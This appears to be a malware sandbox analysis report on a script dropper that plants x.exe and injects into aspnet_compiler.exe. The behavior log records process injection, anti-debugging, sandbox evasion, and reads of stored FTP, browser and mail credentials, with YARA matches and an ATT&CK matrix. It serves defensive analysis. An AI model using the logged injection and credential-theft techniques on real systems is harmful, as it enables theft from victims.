                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 700000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2320000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4320000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5316Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1936Thread sleep time: -720000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00403D74 FindFirstFileW,4_2_00403D74
                          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                          Source: x.exe, 00000002.00000002.2278008968.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                          Source: x.exe, 00000002.00000002.2278008968.0000000003602000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.00000000035BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                          Source: wscript.exe, 00000000.00000002.2257514976.000001A473A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: x.exe, 00000002.00000002.2278008968.0000000003515000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.000000000343A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.0000000003491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                          Source: x.exe, 00000002.00000002.2278008968.0000000003345000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                          Source: aspnet_compiler.exe, 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0495ACA0 CheckRemoteDebuggerPresent,2_2_0495ACA0
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]4_2_0040317B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,4_2_00402B7C
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 6EE008Jump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                          Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                          Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndt-
                          Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progmant-
                          Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                          Source: Yara matchFile source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword4_2_0040D069
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword4_2_0040D069
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                          Source: Yara matchFile source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information221
                          Scripting
                          Valid Accounts1
                          Exploitation for Client Execution
                          221
                          Scripting
                          312
                          Process Injection
                          1
                          Masquerading
                          2
                          OS Credential Dumping
                          221
                          Security Software Discovery
                          Remote Services1
                          Email Collection
                          1
                          Encrypted Channel
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          2
                          Credentials in Registry
                          2
                          Process Discovery
                          Remote Desktop Protocol11
                          Archive Collected Data
                          3
                          Ingress Tool Transfer
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                          Virtualization/Sandbox Evasion
                          Security Account Manager41
                          Virtualization/Sandbox Evasion
                          SMB/Windows Admin Shares2
                          Data from Local System
                          3
                          Non-Application Layer Protocol
